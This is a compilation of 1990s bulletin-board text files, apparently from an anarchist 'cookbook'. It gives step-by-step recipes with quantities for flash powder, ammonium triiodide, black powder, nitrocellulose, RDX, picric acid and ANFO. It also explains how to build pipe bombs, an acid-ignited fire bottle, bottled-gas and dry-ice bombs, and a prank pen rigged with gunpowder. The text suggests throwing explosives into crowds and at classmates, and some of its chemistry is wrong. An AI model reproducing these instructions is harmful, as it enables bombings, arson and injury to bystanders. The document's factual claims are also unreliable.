   It is very important to have the KNO3 very dry, if evolution of ammonia is
observed then the KNO3 has water in it.  Very pure and dry KNO3 is needed.

   KClO3 with Mg or Al metal powders works very well.  Many hands, faces and
lives have been lost with such compositions.

KMnO4 with Mg or Al is also an extremely powerful flash composition.

KClO4 with Al is generally found in comercial fireworks, this does not
mean that it is safe, it is a little safer than KClO3 above.

K2Cr2O7 can also be used as an oxidizer for flash powder.

The finer the oxidizer and the finer the metal powder the more powerful the
explosive.  This of course will also increase the sensetivity of the flash
powder.

For a quick flash small quantities can be burnt in the open.
Larger quantities (50g or more)  ignited in the open can detonate, they do not
need a container to do so.

NOTE:   Flash powder in any container will detonate.

Balanced equations of some oxidizer/metal reactions. Only major products
are considered.  Excess metal powders are generally used.  This excess
burns with atmospheric oxygen.

4 KNO3 + 10 Mg  -->  2 K2O + 2 N2 + 10 MgO + energy

KClO3 + 2 Al  -->  KCl + Al2O3 + energy

3 KClO4 + 8 Al  -->  3 KCl + 4 Al2O3 + energy

6 KMnO4 + 14 Al  -->  3 K2O + 7 Al2O3 + 6 Mn + energy

Make Black Powder first if you have never worked with pyrotechnic 
materials, then think about this stuff.

                                Dr. Van Tiel-   Ph.D. Chemistry


Potassium perchlorate is a lot safer than sodium/potassium chlorate.



                                          Compiled By:

                                                    -= Exodus =-

                                                           '94
 The Firey Explosive Pen   Written by Blue Max of Anarchist-R-Us
 -----------------------

 Materials Needed                       Here's a GREAT little trick to play on
 1] One Ball Point `Click` pen          your best fiend (no thats not a typo) at
 2] Gun Powder                          skool, or maybe as a practial joke on a
 3] 8 or 10 match heads                 friend!
 4] 1 Match stick
 5] a sheet of sand paper (1 1/2" X 2")

1] Unscrew pen and remove all parts but leave the button in the top.
2] Stick the match stick in the part of the pen clicker where the other little
  parts and the ink fill was.
3] Roll sand paper up and put around the match stick that is in the clicker.
4] Put the remaining Match Heads inside the pen, make sure that they are on
   the inside on the sand paper.
5] Put a small piece of paper or something in the other end of the pen where
  the ball point comes out.
6] Fill the end with the piece of paper in it with gun powder.  The paper is
  to keep the powder from spilling.

The Finished pen should look like this:

 Small Paper Clog  Gun Powder   Matches & Sandpaper  \
  |                                                  |
  \             |     |
   \ _________________|____________________|________
    <_______________________________|_______________|===

call the RIPCO bulletin board, 'a hell of a bbs' at (xxx) xxx-xxxx

                         -= Exodus=-    makin' more for '94

PIPE BOMBS FROM SOFT METAL PIPES                          -= Exodus =-

   First, one flattens one end of a copper or aluminum pipe carefully, making
sure not to tear or rip the piping.  Then, the flat end of the pipe should be
folded over at least once, if this does not rip the pipe.  A fuse hole should
be drilled in the pipe near the now closed end, and the fuse should be
inserted.

    Next, the bomb- builder would partially fill the casing with a low order
explosive, and pack it with a large wad of tissue paper.  He would then
flatten and fold the other end of the pipe with a pair of pliers.  If he was
not too dumb, he would do this slowly, since the process of folding and
bending metal gives off heat, which could set off the explosive.  A diagram is
presented below:

(Ill.  #1)
                                                ÚÂÄÄÄÄÄÄ¿
ÚÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ³      ³
³       ³                                    o   ³      ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿³      ³
                                                ÀÁÄÄÄÄÄÄÙ

     fig. 1  pipe with one end flattened and fuse hole drilled (top view)

(Ill.  #2)
                                                 ÚÄÄÂÄÄ¿
     ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ  ³  ³
     ³                                              ³  ³
     ³                                            o ³  ³
     ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿  ³  ³
                                                 ÀÄÄÁÄÄÙ

     fig. 2  pipe with one end flattened and folded up (top view)

(Ill.  #3)
                              ÚÄÄÄÄÄÄÄÄÄÄÄ fuse hole
                              ³
     ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄoÄÄÄÄ¿  ÚÄÄÄÄ¿
     ³                             À¿ ÀÄÄ¿ ³
     ³                              ÀÄÄÄÄÙ ³
     ³                              ÚÄÄÄÄÄÄÙ
     ³                             ÚÙ
     ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

     fig. 3  pipe with flattened and folded end (side view)



       (Revised ill. 4.14)
SAFETY TIPS --  HOW NOT TO GET KILLED   (Ways to avoid scoring an "Own Goal")

        An "own goal" is the death of a person on your side from one of
your own devices. It is obvious that these should be avoided at all
costs. While no safety device is 100% reliable, it is usually better to
err on the side of caution.

                           BASIC SAFETY RULES

1) DON'T SMOKE!  (don't laugh- an errant cigarette wiped out the Weathermen)
2) GRIND ALL INGREDIENTS SEPERATELY. It's suprising how friction sensitive
    some supposedly "safe" explosives really are.
3) ALLOW for a 20% margin of error- Just because the AVERAGE burning rate of a
    fuse is 30 secs/foot, don't depend on the 5 inches sticking out of your
    pipe bomb to take exactly 2.5 minutes.
4) OVERESTIMATE THE RANGE OF YOUR SHRAPNEL. The cap from a pipe bomb can
    oftentravel a block or more at high velocities before coming to rest- If
    you have to stay nearby, remember that if you can see it, it can kill you.
5) When mixing sensitive compounds (such as flash powder) avoid all sources of
   static electricity. Mix the ingredients by the method below:

                       HOW TO MIX INGREDIENTS 

     The best way to mix two dry chemicals to form an explosive is to do as
the small-scale fireworks manufacturer's do:

Ingredients:

1 large sheet of smooth paper (for example a page from a newspaper that does
    not use staples)

The dry chemicals needed for the desired compound.

1) Measure out the appropriate amounts of the two chemicals, and pour them in
    two small heaps near opposite corners of the sheet.
2) Pick up the sheet by the two corners near the powders, allowing the powders
    to  roll towards the middle of the sheet.
3) By raising one corner and then the other, roll the powders back and forth
    in the middle of the open sheet, taking care not to let the mixture spill
    from either of the loose ends.
4) Pour the powder off from the middle of the sheet, and use immediately. If
    it must be stored use airtight containers (35mm film canisters work
    nicely) and store away from people, houses, and valuable items.



                                                    -= Exodus =-


  AMMONIUM TRIIODIDE CRYSTALS

     Ammonium triiodide crystals are foul-smelling purple colored crystals
that decompose under the slightest amount of heat, friction, or shock, if they
are made with the purest ammonia (ammonium hydroxide) and iodine.  Such
crystals are said to detonate when a fly lands on them, or when an ant walks
across them. Household ammonia, however, has enough impurities, such as soaps
and abrasive agents, so that the crystals will detonate when thrown,crushed,
or heated. Ammonia, when bought in stores comes in a variety of forms.  The
pine and cloudy ammonias should not be bought; only the clear ammonia should
be used to make ammonium triiodide crystals. Upon detonation, a loud report is
heard, and a cloud of purple iodine gas appears about the detonation site.
Whatever the unfortunate surface that the crystal was detonated upon will
usually be ruined, as some of the iodine in the crystal is thrown about in a
solid form, and iodine is corrosive.  It leaves nasty, ugly, permanent
brownish-purple stains on whatever it contacts. Iodine gas is also bad news,
since it can damage lungs, and it settles to the ground and stains things
there also.  Touching iodine leaves brown stains on the skin that last for
about a week, unless they are immediately and vigorously washed off.  While
such a compound would have little use to a serious terrorist, a vandal could
utilize them in damaging property.  Or, a terrorist could throw several of
them into a crowd as a distraction, an action which would possibly injure a
few people, but frighten almost anyone, since a small crystal that may not be
seen when thrown produces a rather loud explosion.

    Ammonium triiodide crystals could be produced in the following manner:

     Materials                Equipment
     ÄÄÄÄÄÄÄÄÄ                ÄÄÄÄÄÄÄÄÄ
     iodine crystals          funnel and filter paper
                              paper towels
     clear ammonia
     (ammonium hydroxide,     two throw-away glass jars
      for the suicidal)

1) Place about two teaspoons of iodine into one of the glass jars.  The jars
   must both be throw away because they will never be clean again.

2) Add enough ammonia to completely cover the iodine.

3) Place the funnel into the other jar, and put the filter paper in the
   funnel. The technique for putting filter paper in a funnel is taught in
   every basic chemistry lab class: fold the circular paper in half, so that a
   semi-circle is formed.  Then, fold it in half again to form a triangle with
   one curved side.  Pull one thickness of paper out to form a cone, and place
   the cone into the funnel.

4) After allowing the iodine to soak in the ammonia for a while, pour the
   solution into the paper in the funnel through the filter paper.

5) While the solution is being filtered, put more ammonia into the first jar
   to wash any remaining crystals into the funnel as soon as it drains.

6) Collect all the purplish crystals without touching the brown filter paper,
   and place them on the paper towels to dry for about an hour.  Make sure
   that they are not too close to any lights or other sources of heat, as they
   could well detonate. While they are still wet, divide the wet material into
   eight pieces of about the same size.

7) After they dry, gently place the crystals onto a one square inch piece of
   duct tape.  Cover it with a similar piece, and gently press the duct tape
   together around the crystal, making sure not to press the crystal itself.
   Finally, cut away most of the excess duct tape with a pair of scissors, and
   store the crystals in a cool dry safe place.  They have a shelf life of
   about a week, and they should be stored in individual containers that can
   be thrown away, since they have a tendency to slowly decompose, a process
   which  gives off iodine vapors, which will stain whatever they settle on.
   One possible way to increase their shelf life is to store them in airtight
   containers.  To use them, simply throw them against any surface or place
   them where they will be stepped on or crushed.



                                                  -= Exodus =-
    SULFURIC ACID                                     by Exodus

     Sulfuric acid is far too difficult to make outside of a laboratory or
industrial plant.  However, it is readily available in an uncharged car
battery. A person wishing to make sulfuric acid would simply remove the top of
a car battery and pour the acid into a glass container.  There would probably
be pieces of lead from the battery in the acid which would have to be removed,
either by boiling or filtration.  The concentration of the sulfuric acid can
also be increased by boiling it; very pure sulfuric acid pours slightly faster
than clean motor oil.


   AMMONIUM NITRATE

     Ammonium nitrate is a very powerful but insensitive high-order explosive.
It could be made very easily by pouring nitric acid into a large flask in an ice
bath. Then, by simply pouring household ammonia into the flask and running away,
ammonium nitrate would be formed. After the materials have stopped reacting, one
would simply have to leave the solution in a warm place until all of the water
and any unneutralized ammonia or acid have evaporated. There would be a fine
powder formed, which would be ammonium nitrate. It must be kept in an airtight
container, because of its tendency to pick up water from the air.  The crystals
formed in the above process would have to be heated VERY gently to drive off the
remaining water.

    BLACK POWDER 3

     First made by the Chinese for use in fireworks, black powder was first
used in weapons and explosives in the 12th century.  It is very simple to
make, but it is not very powerful or safe.  Only about 50% of black powder is
converted to hot gasses when it is burned; the other half is mostly very fine
burned particles.  Black powder has one major problem: it can be ignited by
static electricity.  This is very bad, and it means that the material must be
made with wooden or clay tools.  Anyway, a misguided individual could
manufacture black powder at home with the following procedure:

     MATERIALS               EQUIPMENT
     ÄÄÄÄÄÄÄÄÄ               ÄÄÄÄÄÄÄÄÄ
     potassium               clay grinding bowl
     nitrate (75 g)          and clay grinder

       or                         or

     sodium                  wooden salad bowl
     nitrate (75 g)          and wooden spoon

     sulfur (10 g)           plastic bags (3)

     charcoal (15 g)         300-500 ml beaker (1)

     distilled water         coffee pot or heat source



1) Place a small amount of the potassium or sodium nitrate in the grinding
 bowl and grind it to a very fine powder.  Do this to all of the potassium or
 sodium nitrate, and store the ground powder in one of the plastic bags.

2) Do the same thing to the sulfur and charcoal, storing each chemical in a
separate plastic bag.

3) Place all of the finely ground potassium or sodium nitrate in the beaker,
   and add just enough boiling water to the chemical to get it all wet.

4) Add the contents of the other plastic bags to the wet potassium or sodium
nitrate, and mix them well for several minutes.  Do this until there is no
more visible sulfur or charcoal, or until the mixture is universally black.

5) On a warm sunny day, put the beaker outside in the direct sunlight.
  Sunlight is really the best way to dry black powder, since it is never too
  hot, but it is hot enough to evaporate the water.

6) Scrape the black powder out of the beaker, and store it in a safe
 container. Plastic is really the safest container, followed by paper.  Never
 store black powder in a plastic bag, since plastic bags are prone to generate
 static electricity.


Another addition to the CookBook......           -= Exodus =- '94
  NITROCELLULOSE                              -= Exodus =-

     Nitrocellulose is usually called "gunpowder" or "guncotton".  It is more
stable than black powder, and it produces a much greater volume of hot gas.  It
also burns much faster than black powder when it is in a confined space.
Finally, nitrocellulose is fairly easy to make, as outlined by the following
procedure:


     MATERIALS                    EQUIPMENT
     ÄÄÄÄÄÄÄÄÄ                    ÄÄÄÄÄÄÄÄÄ
     cotton  (cellulose)          two (2) 200-300 ml beakers

     concentrated                 funnel and filter paper
     nitric acid
                                  blue litmus paper
     concentrated
     sulfuric acid

     distilled water



1) Pour 10 cc of concentrated sulfuric acid into the beaker.  Add to this    10
cc of concentrated nitric acid.

2) Immediately add 0.5 gm of cotton, and allow it to soak for exactly 3   
minutes.

3) Remove the nitrocotton, and transfer it to a beaker of distilled water    to
wash it in.

4) Allow the material to dry, and then re-wash it.

5) After the cotton is neutral when tested with litmus paper, it is ready to   
be dried and stored.

    R.D.X. 2

     R.D.X., also called cyclonite, or composition C-1 (when mixed with
plasticisers) is one of the most valuable of all military explosives.  This is
because it has more than 150% of the power of T.N.T., and is much easier to
detonate.  It should not be used alone, since it can be set off by a not-too
severe shock.  It is less sensitive than mercury fulminate, or nitroglycerine,
but it is still too sensitive to be used alone.

                         NO
                           2
                          |
                          N
                         / \             RDX MOLECULE
                        /   \
                       H C   H C
                      / 2     2
                     /        |
                   O N        N--NO
                    2 \      /     2
                       \    /
                        \  /
                         CH
                           2

 R.D.X. can be made by the surprisingly simple method outlined hereafter.  It
is much easier to make in the home than all other high explosives, with the
possible exception of ammonium nitrate.

     MATERIALS                    EQUIPMENT
     ÄÄÄÄÄÄÄÄÄ                    ÄÄÄÄÄÄÄÄÄ
     hexamine                     500 ml beaker
       or
     methenamine                  glass stirring rod
     fuel tablets (50 g)
                                  funnel and filter paper
     concentrated
     nitric acid (550 ml)         ice bath container  (plastic bucket)

     distilled water              centigrade thermometer

     table salt                   blue litmus paper

     ice                          ammonium nitrate


1) Place the beaker in the ice bath, (see section 3.13, steps 3-4) and carefully 
   pour 550 ml of concentrated nitric acid into the beaker.

2) When the acid has cooled to below 20 degrees centigrade, add small amounts
   of the crushed fuel tablets to the beaker.  The temperature will rise, and
   it must be kept below 30 degrees centigrade, or dire consequences could
   result. Stir the mixture.

3) Drop the temperature below zero degrees centigrade, either by adding more
   ice and salt to the old ice bath, or by creating a new ice bath.  Or,
   ammonium nitrate could be added to the old ice bath, since it becomes cold
   when it is put in water. Continue stirring the mixture, keeping the
   temperature below zero degrees centigrade for at least twenty minutes

4) Pour the mixture into a litre of crushed ice.  Shake and stir the mixture,
   and allow it to melt.  Once it has melted, filter out the crystals, and
   dispose of the corrosive liquid.

5) Place the crystals into one half a litre of boiling distilled water. Filter
   the crystals, and test them with the blue litmus paper.  Repeat steps 4 and
   5 until the litmus paper remains blue.  This will make the crystals more
   stable and safe.

6) Store the crystals wet until ready for use. Allow them to dry completely
    using them. R.D.X. is not stable enough to use alone as an explosive.

7) Composition C-1 can be made by mixing 88.3% R.D.X. (by weight) with 11.1%
   mineral oil, and 0.6% lecithin. Kneed these material together in a plastic
   bag. This is one way to desensitize the explosive.

8) H.M.X. is a mixture of T.N.T. and R.D.X.; the ratio is 50/50, by weight.   
  it is not as sensitive, and is almost as powerful as straight R.D.X.

9) By adding ammonium nitrate to the crystals of R.D.X. after step 5, it
   should be possible to desensitize the R.D.X. and increase its power, since
   ammonium nitrate is very insensitive and powerful. Soduim or potassium
   nitrate could also be added; a small quantity is sufficient to stabilize
   the R.D.X.

10) R.D.X. detonates at a rate of 8550 meters/second when it is compressed to a  
   density of 1.55 g/cubic cm.

                                             -= Exodus =-
                       ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
                     ÛÛÛÛÛ                        ÛÛÛÛÛ
                     ÛÛÛÛ      áK Gç áá      ÛÛÛÛ
                      ÛÛÛÛ                        ÛÛÛÛ
                       ÛÛÛÛ        ãåë 1        ÛÛÛÛ
                        ÛÛÛÛ                    ÛÛÛÛ
                         ÛÛÛÛ                  ÛÛÛÛ
                          ÛÛÛÛ                ÛÛÛÛ
                           ÛÛÛÛÛ            ÛÛÛÛÛ
                             ÛÛÛÛÛÛ      ÛÛÛÛÛÛ
         ³ ³ ³ëç 3.90      ÛÛÛÛÛ  ÛÛÛÛÛ     ë_  ëçù
         ÀÄÁÄÙ                    ÛÛÛÛÛÛÛÛ        H ý
             ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
              ÛÛÛÛÛÛÛÛÛÛ            ÛÛÛÛ            ÛÛÛÛÛÛÛÛÛÛ
               ÛÛÛÛÛÛ              ÛÛÛÛÛÛ              ÛÛÛÛÛÛ
                ÛÛ                 ÛÛÛÛÛÛ                 ÛÛ
                                  ÛÛÛÛÛÛÛÛ
   1* (20!)-YOU-SUCK              ÛÛÛÛÛÛÛÛ                  EliTe MaIL
   2* (20!)-REAL-BAD             ÛÛÛÛÛÛÛÛÛÛ             -=( NO LEECHES )=-
                                 ÛÛÛÛÛÛÛÛÛÛ                FL, PA, NY, CA
   2 RinGdoWN 9600's            ÛÛÛÛÛÛÛÛÛÛÛÛ                 CoNNexioNs
   1 LocAl 57000 !@             ÛÛÛÛÛÛÛÛÛÛÛÛ
    -0+ DaY WarEZ              ÛÛë_hÛÛ              Sysop - Exodus
     ANFOS

     ANFO is an acronym for Ammonium Nitrate - Fuel Oil Solution.  An ANFO
solves the only other major problem with ammonium nitrate: its tendency to
pick up water vapor from the air.  This results in the explosive failing to
detonate when such an attempt is made.  This is rectified by mixing 94% (by
weight) ammonium nitrate with 6% fuel oil, or kerosene.  The kerosene keeps
the ammonium nitrate from absorbing moisture from the air.  An ANFO also
requires a large shockwave to set it off.


     About ANFO            (From Dean S.)

  Lately there was been a lot said about various ANFO mixtures.  These are
mixtures of Ammonium Nitrate with Fuel Oil.  This forms a reasonably powerful
commercial explosive, with its primary benifit being the fact that it is
cheap.  Bulk ANFO should run somewhere around 9-12 cents the pound. This is
dirt cheap compared to 40% nitro gel dynamites at 1 to 2 dollars the pound. To
keep the cost down, it is frequently mixed at the borehole by a bulk truck,
which has a pneumatic delivery hopper of AN prills (thats pellets to most of
the world) and a tank of fuel oil.  It is strongly recommended that a dye of
some sort, preferably red be added to the fuel oil to make it easier to
distinguish treated AN explosive from untreated oxidizer.

   ANFO is not without its problems.  To begin with, it is not that sensitive
to detonation.  Number eight caps are not reliable when used with ANFO.
Booster charges must be used to avoid dud blast holes.  Common boosters
include sticks of various dynamites, small pours of water gel explosives,
dupont's detaprime cast boosters, and Atlas's power primer cast explosive. The
need to use boosters raises the cost.  Secondly, ANFO is very water
susceptable.  It dissolves in it, or absorbes it from the atmosphere, and
becomes quite worthless real quick.  It must be protected from water with
borehole liners, and still must be shot real quick.  Third, ANFO has a low
density, somewhere around .85.  This means ANFO sacks float, which is no good,
and additionally, the low density means the power is somewhat low. Generally,
the more weight of explosive one can place in a hole, the more effective.
ANFO blown into the hole with a pneumatic system fractures as it is places,
raising the density to about .9 or .92.  The delivery system adds to the cost,
and must be anti static in nature.  Aluminum is added to some commercial,
cartridge packaged ANFOs to raise the density---this also raises power
considerable, and a few of these mixtures are reliablly cap sensitive.

  Now than, for formulations.  An earlier article mentioned 2.5 kilos of
ammonium nitrate, and I believe 5 to 6 liters of diesel.  This mixture is
extremely over fueled, and I'd be surprised if it worked.  Dupont recommends a
AN to FO ratio of 93% AN to 7% FO by weight.  Hardly any oil at all.  More oil
makes the mixture less explosive by absorbing detonation energy, and excess
fuel makes detonation byproducts health hazzards as the mixture is oxygen
poor.  Note that commercial fertilizer products do not work as well as the
porous AN prills dupont sells, because fertilizers are coated with various
materials meant to seal them from moisture, which keep the oil from being
absorbed.

   Another problem with ANFO:  for reliable detonation, it needs confinement,
either from a casing, borehole, etc, or from the mass of the charge.  Thus, a
pile of the stuff with a booster in it is likely to scatter and burn rather
than explode when the booster is shot.  In boreholes, or reasonable strong
casings (cardboard, or heavy plastic film sacks) the stuff detonated quite
well.  So will big piles.  Thats how the explosive potential was discovered: a
small oil freighter rammed a bulk chemical ship.  Over several hours the
cargoes intermixed to some degree, and reached critical mass.  Real big bang.
A useful way to obtain the containment needed is to replace the fuel oil with
a wax fuel.  Mix the AN with just enough melted wax to form a cohesive
mixture, mold into shape.  The wax fuels, and retains the mixture. This is
what the US military uses as a man placed cratering charge.  The military
literature states this can be set off by a blasting cap, but it is important
to remember the military blasting caps are considerable more powerful than
commercial ones.  The military rightly insists on reliability, and thus a
strong cap (maybe 70-80 percent stronger than commercial).  They also tend to
go overboard when calculating demolition charges...., but then hey, who
doesn't....

   Two manuals of interest:  Duponts "Blaster's Handbook", a $20 manual mainly
useful for rock and seismographic operations.  Atlas's "Powder Manual" or
"Manual of Rock Blasting" (I forget the title, its in the office).  This is a
$60 book, well worth the cash, dealing with the above two topics, plus
demolitions, and non-quarry blasting.

    Incidently, combining fuel oil and ammonium nitrate constitutes the
manufacture of a high explosive, and requires a federal permit to manufacture
and store. Even the mines that mix it on site require the permit to
manufacture.  Those who don't manufacture only need permits to store.  Those
who don't store need no permits, which includes most of us:  anyone, at least
in the US may purchase explosives, provided they are 21 or older, and have no
criminal record.  Note they ought to be used immediately, because you do need
a liscence to store. Note also that commercial explosives contain quantities
of tracing agents, which make it real easy for the FBI to trace the explosion
to the purchaser, so please, nobody blow up any banks, orphanages, or old
folks homes, okay.

                              D. S.- Civil Engineer at large.



                            Brought to you in the CookBook IV..

                                        -= Exodus =-
 PICRIC ACID                  Brought to you by: -= Exodus =-



     Picric acid, also known as Tri-Nitro-Phenol, or T.N.P., is a military
explosive that is most often used as a booster charge to set off another less
sensitive explosive, such as T.N.T.  It another explosive that is fairly
simple to make, assuming that one can acquire the concentrated sulfuric and
nitric acids.  Its procedure for manufacture is given in many college
chemistry lab manuals, and is easy to follow.  The main problem with picric
acid is its tendency to form dangerously sensitive and unstable picrate salts,
such as potassium picrate.  For this reason, it is usually made into a safer
form, such as ammonium picrate, also called explosive D.  A social deviant
would probably use a formula similar to the one presented here to make picric
acid.

     MATERIALS                         EQUIPMENT
     ÄÄÄÄÄÄÄÄÄ                         ÄÄÄÄÄÄÄÄÄ
     phenol (9.5 g)                    500 ml flask

     concentrated                      adjustable heat source
     sulfuric acid  (12.5 ml)
                                       1000 ml beaker
     concentrated nitric               or other container
     acid (38 ml)                      suitable for boiling in

     distilled water                   filter paper
                                       and funnel

                                       glass stirring rod


1) Place 9.5 grams of phenol into the 500 ml flask, and carefully add 12.5 ml
   of concentrated sulfuric acid and stir the mixture.

2) Put 400 ml of tap water into the 1000 ml beaker or boiling container and
   bring the water to a gentle boil.

3) After warming the 500 ml flask under hot tap water, place it in the boiling
   water, and continue to stir the mixture of phenol and acid for about thirty
   minutes.  After thirty minutes, take the flask out, and allow it to cool
   for about five minutes.

4) Pour out the boiling water used above, and after allowing the container to
   cool, use it to create an ice bath, similar to the one used in section
   3.13, steps 3-4.  Place the 500 ml flask with the mixed acid an phenol in
   the ice bath.  Add 38 ml of concentrated nitric acid in small amounts,
   stirring the mixture constantly.  A vigorous but "harmless" reaction should
   occur.  When the mixture stops reacting vigorously, take the flask out of
   the ice bath.

5) Warm the ice bath container, if it is glass, and then begin boiling more
   tap water.  Place the flask containing the mixture in the boiling water,
   and heat it in the boiling water for 1.5 to 2 hours.

6) Add 100 ml of cold distilled water to the solution, and chill it in an ice
   bath until it is cold.

7) Filter out the yellowish-white picric acid crystals by pouring the solution
   through the filter paper in the funnel.  Collect the liquid and dispose of
   it in a safe place, since it is corrosive.

8) Wash out the 500 ml flask with distilled water, and put the contents of the
   filter paper in the flask.  Add 300 ml of water, and shake vigorously.

9) Re-filter the crystals, and allow them to dry.

10) Store the crystals in a safe place in a glass container, since they will
    react with metal containers to produce picrates that could explode
    spontaneously.


  CHEMICAL FIRE BOTTLE

     The chemical fire bottle is really an advanced molotov cocktail.  Rather
than using the burning cloth to ignite the flammable liquid, which has at best
a fair chance of igniting the liquid, the chemical fire bottle utilizes the
very hot and violent reaction between sulfuric acid and potassium chlorate.
When the container breaks, the sulfuric acid in the mixture of gasoline sprays
onto the paper soaked in potassium chlorate and sugar.  The paper, when struck
by the acid, instantly bursts into a white flame, igniting the gasoline.  The
chance of failure to ignite the gasoline is less than 2%, and can be reduced
to 0%, if there is enough potassium chlorate and sugar to spare.


     MATERIALS                         EQUIPMENT
     ÄÄÄÄÄÄÄÄÄ                         ÄÄÄÄÄÄÄÄÄ
     potassium chlorate               12 oz.glass bottle
     (2 teaspoons)

     sugar (2 teaspoons)              cap for bottle, w/plastic inside               

     conc. sulfuric acid (4 oz.)      cooking pan with raised edges

     gasoline (8 oz.)                 paper towels

                                      glass or plastic cup and spoon

1) Test the cap of the bottle with a few drops of sulfuric acid to make sure
   that the acid will not eat away the bottle cap during storage.  If the acid
   eats through it in 24 hours, a new top must be found and tested, until  a
   cap that the acid does not eat through is found.  A glass top is excellent.

2) Carefully pour 8 oz. of gasoline into the glass bottle.

3) Carefully pour 4 oz. of concentrated sulfuric acid into the glass bottle.
   Wipe up any spills of acid on the sides of the bottle, and screw the cap on
   the bottle.  Wash the bottle's outside with plenty of water.  Set it aside
   to dry.

4) Put about two teaspoons of potassium chlorate and about two teaspoons of
   sugar into the glass or plastic cup.  Add about 1/2 cup of boiling water,
   or enough to dissolve all of the potassium chlorate and sugar.

5) Place a sheet of paper towel in the cooking pan with raised edges.  Fold
   the paper towel in half, and pour the solution of dissolved potassium
   chlorate and sugar on it until it is thoroughly wet.  Allow the towel to
   dry.

6) When it is dry, put some glue on the outside of the glass bottle containing
   the gasoline and sulfuric acid mixture.  Wrap the paper towel around the
   bottle, making sure that it sticks to it in all places.  Store the bottle
   in a place where it will not be broken or tipped over.

7) When finished, the solution in the bottle should appear as two distinct
   liquids, a dark brownish-red solution on the bottom, and a clear solution
   on top.  The two solutions will not mix.  To use the chemical fire bottle,
   simply throw it at any hard surface.

8) NEVER OPEN THE BOTTLE, SINCE SOME SULFURIC ACID MIGHT BE ON THE CAP, WHICH
   COULD TRICKLE DOWN THE SIDE OF THE BOTTLE AND IGNITE THE POTASSIUM
   CHLORATE, CAUSING A FIRE AND/OR EXPLOSION.

9) To test the device, tear a small piece of the paper towel off the bottle,
   and put a few drops of sulfuric acid on it.  The paper towel should
   immediately burst into a white flame.


  BOTTLED GAS EXPLOSIVES

     Bottled gas, such as butane for refilling lighters, propane for propane
stoves or for bunsen burners, can be used to produce a powerful explosion. To
make such a device, all that a simple-minded anarchist would have to do would
be to take his container of bottled gas and place it above a can of Sterno or
other gelatinized fuel, light the fuel and run. Depending on the fuel used,
and on the thickness of the fuel container, the liquid gas will boil and
expand to the point of bursting the container in about five minutes.

 In theory, the gas would immediately be ignited by the burning gelatinized
fuel, producing a large fireball and explosion. Unfortunately, the bursting of
the bottled gas container often puts out the fuel, thus preventing the
expanding gas from igniting.  By using a metal bucket half filled with
gasoline, however, the chances of ignition are better, since the gasoline is
less likely to be extinguished.  Placing the canister of bottled gas on a bed
of burning charcoal soaked in gasoline would probably be the most effective
way of securing ignition of the expanding gas, since although the bursting of
the gas container may blow out the flame of the gasoline, the burning charcoal
should immediately re-ignite it.  Nitrous oxide, hydrogen, propane, acetylene,
or any other flammable gas will do nicely.

  During the recent gulf war, fuel/air bombs were touted as being second only
to nuclear weapons in their devastating effects. These are basically similar
to the above devices, except that an explosive charge is used to rupture the
fuel container and disperse it over a wide area. a second charge is used to
detonate the fuel. The reaction is said to produce a massive shockwave and to
burn all the oxygen in a large area, causing suffocation.

  Another benefit of a fuel-air explosive is that the gas will seep into
fortified bunkers and other partially-sealed spaces, so a large bomb placed in
a building would result in the destruction of the majority of surrounding
rooms, rendering it structurally unsound.

                                                   Exodus '94
 
 Fun with dry ice... LOTS of fun with dry ice.  (from the Usenet.)
 ---------------------------------------------


   There is no standard formula for a dry ice bomb, however a generic form is
as follows:

Take a 2-liter soda bottle, empty it completely, then add about 3/4 Lb of
Dry Ice (crushed works best) and (optional) a quantity of water.

   Depending on the condition of the bottle, the weather, and the amount and
temperature of the bottle the bomb will go off in 30 seconds - 5 minutes.
Without any water added, the 2-liter bottles will go often in 3-7 minutes if
dropped into a warm river, and in 45 minutes to 1 1/2 hours in open air.

   The explosion sounds equivalent to an M-100. _Plastic_ 16 oz. soda bottles
and 1 liter bottles work almost as well as do the 2-liters, however glass
bottles aren't nearly as loud, and can produce dangerous shrapnel.

   Remember, these are LOUD! A classmate of mine set up 10 bottles
in a nearby park without adding water. After the first two went off (there
was about 10 minutes between explosions) the Police arrived and spent the
next hour trying to find the guy who they thought was setting off M-100's
all around them...

USES FOR DRY ICE

Time Bombs:

1.   Get a small plastic container with lid (we used the small plastic  cans
  that hold the coaters used for large-format Polaroid film). A  film canister
  would probably work; the key is, it should seal tightly  and take a fair
  amount of effort to open).
     Place a chunk of dry ice in the can, put on the lid without quite
  sealing it. Put the assembled bomb in your pocket, or behind your  back.
     Approach the mark and engage in normal conversation. When his  attention
  is drawn away, quickly seal the lid on the bomb, deposit it  somewhere
  within a few feet of the mark, out of obvious sight, then  leave.
      Depending on variables (you'll want to experiment first), you'll hear  a
  loud "pop" and an even louder "Aarrggghhh!" within a minute, when  the CO2
  pressure becomes sufficient to blow off the lid.
     In a cluttered lab, this is doubly nasty because the mark will  proabably
  never figure out what made the noise.

2.  Put 2-3 inches of water in a 2-liter plastic pop bottle.  Put in  as many
  chunks of dry ice as possible before the smoke gets too thick.  Screw on the
  cap, place in an appropriate area, and run like hell.  After about a minute
  (your mileage may vary), a huge explosion will  result, spraying water
  everywhere, along with what's left of the 2-liter bottle.

More things to do with Dry Ice:

   Has anyone ever thrown dry ice into a public pool?  As long as you chuck it
into the bottom of the deep end, it's safe, and it's really impressive if the
water is warm enough

     "Fun stuff. It SCREAMS when it comes into contact with metal..."
     "You can safely hold a small piece of dry ice in your mouth if you  
